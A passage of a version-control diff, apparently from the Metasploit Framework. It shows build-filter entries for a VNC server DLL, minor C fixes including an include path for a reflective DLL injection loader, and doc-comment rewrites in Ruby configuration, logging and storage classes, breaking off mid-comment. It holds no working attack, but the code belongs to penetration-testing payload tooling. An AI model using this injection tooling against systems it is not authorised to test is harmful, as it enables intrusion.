<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\winvnc">
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
<Extensions>.h</Extensions>
</Filter>
<Filter Include="Header Files\libjpeg">
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\zlib">
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\winvnc">
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="vncEncodeCoRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeHexT.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncoder.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeTight.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlib.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlibHex.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="omnithread\nt.cpp">
<Filter>Source Files\omnithread</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcdctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jchuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcinit.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcomapi.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcparam.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcprepct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jctrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatadst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatasrc.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jddctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdhuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdinput.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmerge.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdpostct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdtrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jerror.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctred.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemnobs.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant1.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant2.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jutils.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="zlib\adler32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\compress.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\crc32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\deflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infblock.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infcodes.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inffast.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inftrees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\maketree.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\trees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\uncompr.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\zutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="d3des.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="DynamicFn.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="FileTransferItemInfo.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="MinMax.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="RectList.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="stdhdrs.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinitcmtemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="translate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="TsSessions.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VideoDriver.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncauth.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncBuffer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncClient.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncDesktop.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncInstHandler.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncKeymap.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncRegion.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncServer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncService.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncSockConnect.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VSocket.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="WallpaperUtils.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="omnithread\omnithread.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="common.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jchuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jconfig.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdct.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdhuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jerror.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jinclude.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmemsys.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmorecfg.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpegint.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpeglib.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jversion.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="zlib\deflate.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infblock.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infcodes.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffast.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffixed.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inftrees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\trees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zconf.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zlib.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="AdministrationControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="d3des.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="DynamicFn.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="FileTransferItemInfo.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="IncomingConnectionsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="InputHandlingControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="keysymdef.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MatchWindow.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MinMax.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="PollControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="QuerySettingsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="RectList.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfb.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfbproto.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="SharedDesktopArea.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="stdhdrs.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="translate.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="TsSessions.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VideoDriver.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncAbout.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncauth.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncBuffer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncClient.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncDesktop.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeCoRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeHexT.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncoder.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeTight.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlib.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlibHex.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncInstHandler.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncKeymap.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncPasswd.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncRegion.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncServer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncService.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncSockConnect.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VSocket.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VTypes.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="WallpaperUtils.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT">
<Filter>Header Files\winvnc</Filter>
</Text>
</ItemGroup>
</Project>

2
external/source/vncdll/winvnc/vncDesktop.cpp vendored Normal file → Executable file
View File

@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH];
sprintf(
szFileName,
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond,
ptr);

2
external/source/vncdll/winvnc/vncdll.cpp vendored Normal file → Executable file
View File

@ -15,7 +15,7 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL;

2
external/source/vncdll/winvnc/zlib/inffast.c vendored Normal file → Executable file
View File

@ -99,7 +99,7 @@ z_streamp z;
do {
r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */
e = s->end - r;
e = (uInt)(s->end - r);
if (c > e)
{
c -= e; /* wrapped copy */

2
external/source/vncdll/winvnc/zlib/inflate.c vendored Normal file → Executable file
View File

@ -334,7 +334,7 @@ z_streamp z;
}
/* restore */
z->total_in += p - z->next_in;
z->total_in += (uLong)(p - z->next_in);
z->next_in = p;
z->avail_in = n;
z->state->sub.marker = m;

2
external/source/vncdll/winvnc/zlib/infutil.h vendored Normal file → Executable file
View File

@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */
/* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;}
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);}

157
lib/msf/base/config.rb
View File

@ -3,22 +3,16 @@ require 'fileutils'
module Msf
###
#
# This class wraps interaction with global configuration that can be used as a
# persistent storage point for configuration, logs, and other such fun things.
#
###
class Config < Hash
#
# The installation root directory for the distribution
#
# The installation's root directory for the distribution
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
#
# Determines the base configuration directory.
#
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
@ -47,7 +41,11 @@ class Config < Hash
#
# Default values
#
# Default system file separator.
FileSep = File::SEPARATOR
# Default configuration locations.
Defaults =
{
'ConfigDirectory' => get_config_root,
@ -68,247 +66,260 @@ class Config < Hash
#
##
#
# Returns the framework installation root.
#
# @return [String] the framework installation root {InstallRoot}.
def self.install_root
InstallRoot
end
# Returns the configuration directory default.
#
# Calls the instance method.
#
# @return [String] the root configuration directory.
def self.config_directory
self.new.config_directory
end
# Returns the global module directory.
#
# Calls the instance method.
#
# @return [String] path to global module directory.
def self.module_directory
self.new.module_directory
end
# Returns the path that scripts can be loaded from.
#
# Calls the instance method.
#
# @return [String] path to script directory.
def self.script_directory
self.new.script_directory
end
# Returns the directory that log files should be stored in.
#
# Calls the instance method.
#
# @return [String] path to log directory.
def self.log_directory
self.new.log_directory
end
# Returns the directory that plugins are stored in.
#
# Calls the instance method.
#
# @return [String] path to plugin directory.
def self.plugin_directory
self.new.plugin_directory
end
# Returns the user-specific plugin base path
#
# Calls the instance method.
#
# @return [String] path to user-specific plugin directory.
def self.user_plugin_directory
self.new.user_plugin_directory
end
# Returns the directory in which session log files are to reside.
#
# Calls the instance method.
#
# @return [String] path to session log directory.
def self.session_log_directory
self.new.session_log_directory
end
# Returns the directory in which captured data will reside.
#
# Calls the instance method.
#
# @return [String] path to loot directory.
def self.loot_directory
self.new.loot_directory
end
# Returns the directory in which locally-generated data will reside.
#
# Calls the instance method.
#
# @return [String] path to locally-generated data directory.
def self.local_directory
self.new.local_directory
end
# Returns the user-specific module base path
#
# Calls the instance method.
#
# @return [String] path to user-specific modules directory.
def self.user_module_directory
self.new.user_module_directory
end
# Returns the user-specific script base path
#
# Calls the instance method.
#
# @return [String] path to user-specific script directory.
def self.user_script_directory
self.new.user_script_directory
end
# Returns the data directory
#
# Calls the instance method.
#
# @return [String] path to data directory.
def self.data_directory
self.new.data_directory
end
# Returns the full path to the configuration file.
#
# Calls the instance method.
#
# @return [String] path to the configuration file.
def self.config_file
self.new.config_file
end
# Returns the full path to the history file.
#
# Calls the instance method.
#
# @return [String] path the history file.
def self.history_file
self.new.history_file
end
# Initializes configuration, creating directories as necessary.
#
# Calls the instance method.
#
# @return [void]
def self.init
self.new.init
end
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# Calls the instance method.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def self.load(path = nil)
self.new.load(path)
end
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# Calls the instance method.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def self.save(opts)
self.new.save(opts)
end
#
# Updates the config class' self with the default hash.
#
# @return [Hash] the updated Hash.
def initialize
update(Defaults)
end
#
# Returns the installation root directory
#
# @return [String] the installation root directory {InstallRoot}.
def install_root
InstallRoot
end
#
# Returns the configuration directory default.
#
# @return [String] the root configuration directory.
def config_directory
self['ConfigDirectory']
end
#
# Returns the full path to the configuration file.
#
# @return [String] path to the configuration file.
def config_file
config_directory + FileSep + self['ConfigFile']
end
# Returns the full path to the history file.
#
# Returns the full path to the configuration file.
#
# @return [String] path the history file.
def history_file
config_directory + FileSep + "history"
end
#
# Returns the global module directory.
#
# @return [String] path to global module directory.
def module_directory
install_root + FileSep + self['ModuleDirectory']
end
#
# Returns the path that scripts can be loaded from.
#
# @return [String] path to script directory.
def script_directory
install_root + FileSep + self['ScriptDirectory']
end
#
# Returns the directory that log files should be stored in.
#
# @return [String] path to log directory.
def log_directory
config_directory + FileSep + self['LogDirectory']
end
#
# Returns the directory that plugins are stored in.
#
# @return [String] path to plugin directory.
def plugin_directory
install_root + FileSep + self['PluginDirectory']
end
#
# Returns the directory in which session log files are to reside.
#
# @return [String] path to session log directory.
def session_log_directory
config_directory + FileSep + self['SessionLogDirectory']
end
#
# Returns the directory in which captured data will reside.
#
# @return [String] path to loot directory.
def loot_directory
config_directory + FileSep + self['LootDirectory']
end
#
# Returns the directory in which locally-generated data will reside.
#
# @return [String] path to locally-generated data directory.
def local_directory
config_directory + FileSep + self['LocalDirectory']
end
#
# Returns the user-specific module base path
#
# @return [String] path to user-specific modules directory.
def user_module_directory
config_directory + FileSep + "modules"
end
#
# Returns the user-specific plugin base path
#
# @return [String] path to user-specific plugin directory.
def user_plugin_directory
config_directory + FileSep + "plugins"
end
#
# Returns the user-specific script base path
#
# @return [String] path to user-specific script directory.
def user_script_directory
config_directory + FileSep + "scripts"
end
#
# Returns the data directory
#
# @return [String] path to data directory.
def data_directory
install_root + FileSep + self['DataDirectory']
end
#
# Initializes configuration, creating directories as necessary.
#
# @return [void]
def init
FileUtils.mkdir_p(module_directory)
FileUtils.mkdir_p(config_directory)
@ -320,27 +331,31 @@ class Config < Hash
FileUtils.mkdir_p(user_plugin_directory)
end
#
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def load(path = nil)
path = config_file if (!path)
return Rex::Parser::Ini.new(path)
end
#
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path is one isn't specified. The options should be group
# references that have named value pairs. Example:
#
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def save(opts)
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)

32
lib/msf/base/logging.rb
View File

@ -4,19 +4,19 @@ require 'msf/base'
module Msf
###
#
# This module provides an initialization interface for logging.
#
###
class Logging
#Is logging initialized
#@private
@@initialized = false
#Is session logging enabled
#@private
@@session_logging = false
#
# Initialize logging.
#
# @return [void]
def self.init
if (! @@initialized)
@@initialized = true
@ -35,9 +35,13 @@ class Logging
end
end
# Enables a log source of name src. Creates the .log file in the
# configured directory if logging is not already enabled for this
# source.
#
# Enables a log source.
#
# @param src [String] log source name.
# @param level [Integer] logging level.
# @return [void]
def self.enable_log_source(src, level = 0)
if (log_source_registered?(src) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -47,30 +51,33 @@ class Logging
end
end
#
# Stops logging for a given log source.
#
# @param src [String] the log source to disable.
# @return [Boolean] true if successful. false if not.
def self.disable_log_source(src)
deregister_log_source(src)
end
#
# Sets whether or not session logging is to be enabled.
#
# @param tf [Boolean] true if enabling. false if disabling.
# @return [void]
def self.enable_session_logging(tf)
@@session_logging = tf
end
#
# Returns whether or not session logging is enabled.
#
# @return [Boolean] true if enabled. false if disabled.
def self.session_logging_enabled?
@@session_logging || false
end
#
# Starts logging for a given session.
#
# @param session [Msf::Session] the session to start logging on.
# @return [void]
def self.start_session_log(session)
if (log_source_registered?(session.log_source) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -82,9 +89,10 @@ class Logging
end
end
#
# Stops logging for a given session.
#
# @param session [Msf::Session] the session to stop logging.
# @return [Boolean] true if sucessful. false if not.
def self.stop_session_log(session)
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)

23
lib/msf/base/persistent_storage.rb
View File

@ -1,24 +1,25 @@
# -*- coding: binary -*-
module Msf
###
#
# This class provides a generalized interface to persisting information,
# either in whole or in part, about the state of the framework. This can
# be used to store data that can later be reinitialized in a new instance
# of the framework or to provide a simple mechanism for generating reports
# of some form.
#
###
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
class PersistentStorage
@@storage_classes = {}
#
# Creates an instance of the storage class with the supplied name. The
# array supplied as an argument is passed to the constructor of the
# associated class as a means of generic initialization.
#
# @param name [String] the name of the storage class.
# @param params [Object] the parameters to give the new class.
# @return [PersistentStorage] the newly created class.
# @return [nil] if class has not been added through {.add_storage_class}.
def self.create(name, *params)
if (klass = @@storage_classes[name])
klass.new(*params)
@ -27,36 +28,42 @@ class PersistentStorage
end
end
#
# Stub initialization routine that takes the params passed to create.
#
# @param params [Object] the parameters to initialize with.
def initialize(*params)
end
#
# This methods stores all or part of the current state of the supplied
# framework instance to whatever medium the derived class implements.
# If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework state to store.
# @return [void] no implementation.
# @raise [NotImpementedError] raised if not implemented.
def store(framework)
raise NotImplementedError
end
#
# This method initializes the supplied framework instance with the state
# that is stored in the persisted backing that the derived class
# implements. If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework to restore state to.
# @return [void] no implementation.
# @raise [NotImplementedError] raised if not implemented.
def fetch(framework)
raise NotImplementedError
end
#
# This method adds a new storage class to the hash of storage classes that
# can be created through create.
#
# @param name [String] the name of the storage class.
# @param klass [PersistentStorage] the storage class to add.
# @return [void]
def self.add_storage_class(name, klass)
@@storage_classes[name] = klass
end

14
lib/msf/base/persistent_storage/flatfile.rb
View File

@ -2,30 +2,29 @@
module Msf
class PersistentStorage
###
#
# This class persists the state of the framework to a flatfile in a human
# readable format. At the moment, the level of information it conveys is
# rather basic and ugly, but this is just a prototype, so it will be improved.
# Oh yes, it will be improved.
#
###
class Flatfile < PersistentStorage
#
# Initializes the flatfile for storage based on the parameters specified.
# The hash must contain a FilePath attribute.
#
# @overload initialize(path)
# Initializes the flatfile with the set path.
# @param path [String] path of the flatfile.
def initialize(*params)
raise ArgumentError, "You must specify a file path" if (params.length == 0)
self.path = params[0]
end
#
# This method stores the current state of the framework in human readable
# form to a flatfile. This can be used as a reporting mechanism.
#
# @param framework [Msf:::Framework] the Framework to store.
# @return [void]
def store(framework)
# Open the supplied file path for writing.
self.fd = File.new(self.path, "w")
@ -41,10 +40,11 @@ protected
attr_accessor :fd, :path # :nodoc:
#
# This method stores general information about the current state of the
# framework instance.
#
# @param framework [Msf::Framework] the Framework to store.
# @return [void]
def store_general(framework)
fd.print(
"\n" +

100
lib/msf/base/serializer/readable_text.rb
View File

@ -2,22 +2,22 @@
module Msf
module Serializer
###
#
# This class formats information in a plain-text format that
# is meant to be displayed on a console or some other non-GUI
# medium.
#
###
class ReadableText
#Default number of characters to wrap at.
